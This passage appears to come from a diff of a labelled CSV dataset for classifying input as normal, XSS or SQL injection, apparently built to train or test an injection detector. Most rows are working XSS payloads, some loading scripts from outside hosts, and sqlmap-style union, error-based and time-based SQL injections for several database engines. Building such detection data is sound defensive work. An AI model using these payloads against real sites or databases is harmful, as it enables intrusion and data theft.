onanimationiteration=""alert(1)""></ol>",1,XSS,2755 +"<q onmouseleave=""alert(1)"">test</q>",1,XSS,8115 +"<rt onmouseover=""alert(1)"">test</rt>",1,XSS,2468 +1 ) ) as somz where 1598 = 1598,2,SQLi,14444 +Delete the irrelevant comments.,0,normal,22646 +"<kbd onbeforepaste=""alert(1)"" contenteditable>test</kbd>",1,XSS,4776 +Several pharmaceutical companies temporarily froze prices on select drugs last year.,0,normal,25523 +Select breakfast.,0,normal,24466 +Merge the project teams.,0,normal,22699 +Select your application.,0,normal,24909 +I need to decide where to go for a hike.,0,normal,23778 +"-2167' ) ) ) union all select 3804,3804,3804,3804,3804,3804#",2,SQLi,14836 +"1' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'dgwe' like 'dgwe",2,SQLi,21307 +"<small onclick=""alert(1)"">test</small>",1,XSS,6596 +"1' ) as dajk where 1452 = 1452 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,18278 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( ""ekbq"" = ""ekbq",2,SQLi,18001 +"-8971'|| ( select 'smyx' where 7970 = 7970 union all select 7970,7970,7970,7970,7970,7970,7970#",2,SQLi,13339 +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\,1,XSS,829 +Specify filters where applicable.,0,normal,23213 +"-5009 ) where 8463 = 8463 union all select 8463,8463,8463,8463,8463,8463--",2,SQLi,15495 +"1%' ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,19978 +select sleep ( 5 ) and ( ( ( 'rzjf' = 'rzjf,2,SQLi,15023 +"-4205' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,17492 +"><script+src=https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)""></script>",1,XSS,9775 +"select * from users where id = 1<@<@ union select 1,version ( ) -- 1",2,SQLi,11784 +"1' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'vcph' = 'vcph",2,SQLi,13822 +"1 ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,12321 +1'+ ( select vfmy where 5711 = 5711,2,SQLi,21474 +"iif ( 9007 = 3836,1,1/0 )",2,SQLi,17300 +"<set attributeName=""onmouseover"" to=""alert(89)""/>",1,XSS,9249 +"-9456%"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""%"" = """,2,SQLi,14342 +"<noscript onmousedown=""alert(1)"">test</noscript>",1,XSS,5395 +1' ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,15295 +Select the best lens for capturing beauty.,0,normal,24138 +Plant a cherry tree.,0,normal,22585 +"<bdo oncopy=""alert(1)"" contenteditable>test</bdo>",1,XSS,2189 +"<html onbeforecut=""alert(1)"" contenteditable>test</html>",1,XSS,1963 +Where is my iPhone?,0,normal,22974 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'afdy' like 'afdy",2,SQLi,21314 +"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ""okpa"" = ""okpa",2,SQLi,13904 +"<style>:target {color:red;}</style><del id=x style=""transition:color 1s"" ontransitionend=alert(1)></del>",1,XSS,3534 +"benchmark(50000000,MD5(1))--",2,SQLi,10275 +ORDER BY 27#,2,SQLi,10194 +"To view a larger version of an image, simply select one of the thumbnails below.",0,normal,25215 +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus>,1,XSS,2560 +"<small draggable=""true"" ondragenter=""alert(1)"">test</small>",1,XSS,7933 +"<element onmouseover=""alert(1)"">test</element>",1,XSS,5188 +1'+ ( select 'rkap' where 9692 = 9692,2,SQLi,16477 +"<style oncontextmenu=""alert(1)"">test</style>",1,XSS,8843 +or '1'='1,2,SQLi,10046 +"1 where 9083 = 9083 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,21891 +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption>,1,XSS,5505 +"To view the video clips, the site requires the user to first select a video player.",0,normal,25213 +Select quadruple-check.,0,normal,24537 +"<blockquote onpaste=""alert(1)"" contenteditable>test</blockquote>",1,XSS,8519 +"<keygen draggable=""true"" ondragleave=""alert(1)"">test</keygen>",1,XSS,4011 +1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ),2,SQLi,12291 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) )",2,SQLi,12759 +"1'+ ( select bruk where 1400 = 1400 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) ) +'",2,SQLi,16896 +"1 where 7412 = 7412 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,17249 +1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,18638 +"The select committee of 1873, appointed to inquire into parochial boundaries, reported to the effect that the parish bears no definite relation to any other administrative area, except indeed to the poor-law union.",0,normal,25319 +select * from users where id = 1 +1 or 1 = 1 -- 1,2,SQLi,11995 +"<style>@keyframes slidein {}</style><main style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></main>",1,XSS,4982 +"1'|| ( select 'uqbj' from dual where 6736 = 6736 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,13385 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21",2,SQLi,10414 +"<div draggable=""true"" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas>",1,XSS,7956 +"<style>@keyframes slidein {}</style><element style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></element>",1,XSS,2251 +1' ) ) and ( 1427 = 5813 ) *5813 and ( ( 'estb' like 'estb,2,SQLi,20179 +"<iframe oncontextmenu=""alert(1)"">test</iframe>",1,XSS,8019 +"1%"" ) ) order by 1#",2,SQLi,17402 +"-4054"" or 2824 = 4788--",2,SQLi,14711 +"1'+ ( select vupb where 9575 = 9575 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,19483 +"<div id=""114""><x style=""background:url('x[a];color:red;/*')"">XXX</x>//[""'`-->]]>]</div>",1,XSS,9049 +1' ) where 2974 = 2974 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,16720 +1' ) ) as bewk where 3672 = 3672 or sleep ( 5 ) --,2,SQLi,16894 +1' ) and 7533 = 7533 and ( 'dbjq' = 'dbjq,2,SQLi,15190 +<svg><sub onload=alert(1)></sub>,1,XSS,4992 +"<style>:target {transform: rotate(180deg);}</style><h1 id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></h1>",1,XSS,8858 +Extra 20% off select items with code SAVER (through August 15).,0,normal,26159 +1' where 3028 = 3028,2,SQLi,21763 +"1 ) ) ) union all select null,null,null,null,null,null,null--",2,SQLi,12558 +Select your consider.,0,normal,24941 +WHERE 1=1 AND 1=0#,2,SQLi,10134 +Delete the incorrect entry.,0,normal,22550 +"?goto=javascript:alert(1)"",",1,XSS,9839 +"1%"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""%"" = """,2,SQLi,19549 +"1 ) as wuio where 5312 = 5312 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,16636 +"1'|| ( select 'pzoe' where 2977 = 2977 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,15646 +"1"" ) as eoer where 8667 = 8667 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",2,SQLi,21290 +"<em oncut=""alert(1)"" contenteditable>test</em>",1,XSS,5709 +1,0,normal,26489 +"waitfor delay '0:0:5' and ( ( ""zili"" like ""zili",2,SQLi,17236 +) or sleep(5)=',2,SQLi,10250 +Select your outcome.,0,normal,24844 +""" or ""a"" = ""a",2,SQLi,11956 +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus>,1,XSS,5884 +1 ) ) as ehlg where 6340 = 6340,2,SQLi,14092 +"Select the movie title as you would any app, and select from the options to purchase or rent the movie for different prices.",0,normal,25554 +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame>,1,XSS,6613 +"1%' and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,21022 +Select pick.,0,normal,24528 +"-9699"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""dufs"" = ""dufs",2,SQLi,13824 +"<param draggable=""true"" ondrag=""alert(1)"">test</param>",1,XSS,4983 +"<meta charset= ""x-imap4-modified-utf7""&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>",1,XSS,736 +Select sell.,0,normal,24736 +"1 ) ) union all select null,null,null,null#",2,SQLi,13696 +"<hgroup onmouseleave=""alert(1)"">test</hgroup>",1,XSS,4936 +<shadow onpointerenter=alert(1)>XSS</shadow>,1,XSS,8248 +Where's the table stored?,0,normal,23354 +1' ) ) as stnn where 6160 = 6160 and 8881 = 7347--,2,SQLi,17395 +"<legend draggable=""true"" ondragstart=""alert(1)"">test</legend>",1,XSS,5552 +Select your importance.,0,normal,24847 +1 ) ) or pg_sleep ( __TIME__ ) --,2,SQLi,11397 +The Financial Select Sector SPDR Fund (XLF) dropped 1.4 percent.,0,normal,25411 +"select * from users where id = '1' or \.<\ union select 1,@@VERSION -- 1'",2,SQLi,11306 +"-1197"" ) ) as dfsy where 8857 = 8857 or 3038 = 3038",2,SQLi,19432 +"Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>",1,XSS,9314 +"-9142%"" ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,21598 +"1 ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,14665 +<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>,1,XSS,8029 +select ( case when ( 2717 = 2634 ) then 2717 else 2717* ( select 2717 from mysql.db ) end ) #,2,SQLi,15145 +"<style>@keyframes slidein {}</style><hgroup style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></hgroup>",1,XSS,8833 +declare @q nvarchar ( 4000 ) select @q =,2,SQLi,11853 +"1 ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 1782 = 1782",2,SQLi,14116 +1' ) where 8086 = 8086 and 1430 = 7941--,2,SQLi,21942 +"<scRiPt y=""><"">/*<sCRipt* */prompt()</script",1,XSS,9196 +"=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z",2,SQLi,11286 +<svg><strike onload=alert(1)></strike>,1,XSS,6207 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( '%' = '",2,SQLi,17541 +"<aside onmouseleave=""alert(1)"">test</aside>",1,XSS,3038 +"1"" ) as zjwu where 9963 = 9963 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,18925 +"1%"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,14450 +<button onRowInserted=javascript:alert(1)>,1,XSS,9626 +"1 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,19459 +"1"" ) ) order by 1#",2,SQLi,19595 +"1', ( begin if ( 8340 = 8340 ) then dbms_lock.sleep ( 5 )",2,SQLi,14582 +"<del oncontextmenu=""alert(1)"">test</del>",1,XSS,3238 +Check conditions where possible.,0,normal,23236 +Select guest room entrances exhibit art inspired by crystal pieces.,0,normal,25588 +"1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) --",2,SQLi,18677 +"<base onmouseup=""alert(1)"">test</base>",1,XSS,5918 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ""%"" = """,2,SQLi,14792 +1'+ ( select mhfn where 2425 = 2425,2,SQLi,18990 +<nav id=x tabindex=1 onfocus=alert(1)></nav>,1,XSS,6203 +"1 where 9898 = 9898 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,21595 +"1 ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,22171 +"<head oncontextmenu=""alert(1)"">test</head>",1,XSS,4741 +"-6965' ) union all select 2857,2857,2857,2857,2857,2857,2857,2857,2857,2857--",2,SQLi,21874 +Sort results where valid.,0,normal,23284 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( '%' = '",2,SQLi,16838 +<br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus>,1,XSS,7169 +"<SCRIPT a="">"" '' SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,292 +"<element onbeforecopy=""alert(1)"" contenteditable>test</element>",1,XSS,1953 +You can select.,0,normal,24764 +"1%' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( '%' = '",2,SQLi,13083 +"<IMG SRC=""jav&#x0A;ascript:alert(<WBR>'XSS');"">",1,XSS,1633 +"1' ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 'gcna' = 'gcna",2,SQLi,13743 +"<noscript oncontextmenu=""alert(1)"">test</noscript>",1,XSS,2702 +%20or%201=1,2,SQLi,9998 +"1%"" ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ""%"" = """,2,SQLi,21371 +<div id=x tabindex=1 onfocusin=alert(1)></div>,1,XSS,4488 +"<style>@keyframes x{}</style><s style=""animation-name:x"" onanimationend=""alert(1)""></s>",1,XSS,2585 +1 or pg_sleep(5)--,2,SQLi,10261 +"select * from users where id = 1 union select @ _,version ( ) -- 1",2,SQLi,11766 +1' ) as rvli where 4427 = 4427,2,SQLi,19773 +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus>,1,XSS,7160 +Select follow.,0,normal,24625 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",2,SQLi,10501 +"1 ) where 5232 = 5232 union all select null,null,null#",2,SQLi,14702 +"<wbr onmouseleave=""alert(1)"">test</wbr>",1,XSS,3931 +1' ) ) as yyrx where 5600 = 5600,2,SQLi,22274 +"1'|| ( select 'uvbb' where 7795 = 7795 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,17168 +"1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'jmub' = 'jmub",2,SQLi,21620 +<listing onpointerout=alert(1)>XSS</listing>,1,XSS,8095 +"<script onmouseenter=""alert(1)"">test</script>",1,XSS,3835 +1' ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16112 +<summary onpointerleave=alert(1)>XSS</summary>,1,XSS,3602 +Where did you find that beautiful sunset view?,0,normal,23703 +"To do a search, select an item and click Paste to add an item to the search screen, then submit the query.",0,normal,25241 +<link rel=stylesheet href=1 onerror=alert(1)>,1,XSS,6915 +"<acronym onpaste=""alert(1)"" contenteditable>test</acronym>",1,XSS,1880 +"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'dfxd' like 'dfxd",2,SQLi,19926 +"<label draggable=""true"" ondragend=""alert(1)"">test</label>",1,XSS,8875 +"x=alert,x(1)",1,XSS,9339 +Where's your SQL documentation?,0,normal,23373 +"1%' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,14024 +Find missing sock.,0,normal,23028 +"><script+src=https://suggest.taobao.com/sug?callback=alert(1337)""></script>",1,XSS,9751 +"1%"" ) or sleep ( 5 ) and ( ""%"" = """,2,SQLi,19993 +"1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) -- wvjy",2,SQLi,14935 +"-1863' ) or make_set ( 9354 = 9354,7185 ) and ( 'whwv' = 'whwv",2,SQLi,17036 +"For it endured for fourteen years, and was just as burning and as terrible when Hastings was acquitted in 1795, as in the select committee of 1781 when Hastings's enormities were first revealed.",0,normal,26133 +"<th onmouseup=""alert(1)"">test</th>",1,XSS,8517 +-7242' or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'kfff' = 'kfff,2,SQLi,14921 +"<tr draggable=""true"" ondragleave=""alert(1)"">test</tr>",1,XSS,8100 +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>,1,XSS,8569 +"<style>:target {color:red;}</style><applet id=x style=""transition:color 1s"" ontransitionend=alert(1)></applet>",1,XSS,4006 +"<div draggable=""true"" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset>",1,XSS,8649 +<script>parent['alert'](1)</script>,1,XSS,9677 +"-6129 union all select 9122,9122#",2,SQLi,14191 +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus>,1,XSS,6329 +"1 ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 1205 = 1205",2,SQLi,21795 +1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) # cykf,2,SQLi,18660 +Universal Studios Hollywood Halloween Horror Nights runs select evenings Sept.,0,normal,25189 +Take 30 percent off select styles with code: PRES30. Asos,0,normal,25474 +"1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""igop"" = ""igop",2,SQLi,12646 +"<applet onkeydown=""alert(1)"" contenteditable>test</applet>",1,XSS,2010 +"alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--",1,XSS,753 +"-1244 ) as qszw where 2332 = 2332 union all select 2332,2332,2332,2332#",2,SQLi,12777 +"-1148"" ) ) union all select 5442,5442,5442,5442#",2,SQLi,17572 +"select * from users where id = 1 or ""{,"" = 1 or 1 = 1 -- 1",2,SQLi,11725 +select case when 4656 = 3716 then 1 else null end--,2,SQLi,20340 +"1"" where 9173 = 9173 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --",2,SQLi,18907 "<SCRIPT/XSS SRC=""http://xss.rocks/xss.js""></SCRIPT>",1,XSS,246 -"javascript:/*""/*'/*\""/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script>",1,XSS,9530 -"<ruby draggable=""true"" ondrag=""alert(1)"">test</ruby>",1,XSS,5117 -"-7234"" ) union all select 3154,3154,3154,3154#",2,SQLi,21720 -"1%"" ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15204 -<canvas onpointerenter=alert(1)>XSS</canvas>,1,XSS,6627 -Select a meditation technique to try.,0,normal,24252 -"<style>@keyframes x{}</style><i style=""animation-name:x"" onanimationstart=""alert(1)""></i>",1,XSS,2603 --1549' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'fnwx' = 'fnwx,2,SQLi,17188 -"&lt;A HREF=\""http&#58;//ha&#46;ckers&#46;org@google\""&gt;XSS&lt;/A&gt;",1,XSS,1012 -Merge the data sources.,0,normal,22911 -"1%"" ) ) ) union all select null,null,null,null,null,null#",2,SQLi,20067 -"1"" ) ) as qhnb where 8302 = 8302 and ( 3020 = 3020 ) *6703--",2,SQLi,14590 --3520%' or 8571 = 8571--,2,SQLi,22156 -"-2149"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( ""hoon"" like ""hoon",2,SQLi,22040 -"{""id"":null,""name"":""Ducklett""}",0,normal,25833 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( '%' = '",2,SQLi,14222 -<applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus>,1,XSS,2662 -"<style>@keyframes slidein {}</style><figure style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></figure>",1,XSS,4058 -Let's discuss where to go for the weekend.,0,normal,24162 -select ( case when ( 6002 = 9048 ) then 6002 else 6002* ( select 6002 from mysql.db ) end ) #,2,SQLi,18676 -"<style>@keyframes slidein {}</style><ol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></ol>",1,XSS,2765 -<dd onpointerup=alert(1)>XSS</dd>,1,XSS,6516 -"1 ) ) as debc where 7428 = 7428 union all select null,null,null#",2,SQLi,14994 -Select a scenic view for your landscape.,0,normal,23184 -"<acronym draggable=""true"" ondragleave=""alert(1)"">test</acronym>",1,XSS,3795 -"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""ponv"" = ""ponv",2,SQLi,17466 -"-5826"" ) ) union all select 7192,7192#",2,SQLi,18039 -Let's find out where the local festival is.,0,normal,24126 -"1 ) and elt ( 3138 = 1817,1817 )",2,SQLi,18334 -"<style>@keyframes x{}</style><hgroup style=""animation-name:x"" onanimationend=""alert(1)""></hgroup>",1,XSS,5237 -I want to select a playlist for the road trip.,0,normal,24029 -Select your dream team.,0,normal,24516 -"-5738"" ) as efbn where 8541 = 8541 union all select 8541,8541,8541,8541,8541,8541,8541,8541#",2,SQLi,21005 -"-7381' ) ) or elt ( 5882 = 5919,5919 ) and ( ( 'nzri' = 'nzri",2,SQLi,15561 -"<section onmousemove=""alert(1)"">test</section>",1,XSS,7192 -"1' in boolean mode ) union all select null,null,null,null,null,null#",2,SQLi,16170 -"1, ( select 6825 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6825 = 6825,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,19446 -I need to select the right class for my interests.,0,normal,24089 -"1"" ) ) ) union all select null,null,null,null--",2,SQLi,17063 -"1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'opll' like 'opll",2,SQLi,14566 -"1%' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( '%' = '",2,SQLi,12335 -"<IMG SRC=x ondragleave=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1164 -"1 ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18662 -WAITFOR DELAY '0:0:5'--,2,SQLi,11380 -"<bgsound ondblclick=""alert(1)"">test</bgsound>",1,XSS,3348 -( select * from ( select ( sleep ( 5 ) ) ) acdk ) #,2,SQLi,18870 -"<meter onmouseup=""alert(1)"">test</meter>",1,XSS,4964 -"1 ) ) as jmcp where 8624 = 8624 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,19430 -"-8929%' ) union all select 9486,9486,9486,9486#",2,SQLi,13853 -or 1 = 1#,2,SQLi,12170 -1 ) as lvfu where 5831 = 5831 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,17745 -<svg><strong onload=alert(1)></strong>,1,XSS,2446 -1' ) and 2564 = 3234--,2,SQLi,20285 -"{""id"":null,""name"":""Tankmon""}",0,normal,25993 -Where's your SQL purpose?,0,normal,23614 -1' ) ) as hxxm where 3792 = 3792 and sleep ( 5 ) #,2,SQLi,15606 -"<wbr oncut=""alert(1)"" contenteditable>test</wbr>",1,XSS,1860 -waitfor delay '0:0:5' and ( ( ( 8981 = 8981,2,SQLi,15708 -<input onpointerout=alert(1)>XSS</input>,1,XSS,6945 --5918' ) as olzc where 5992 = 5992 or 4390 = 9085,2,SQLi,12367 -Select a hairstyle for a special occasion.,0,normal,24235 -<dt 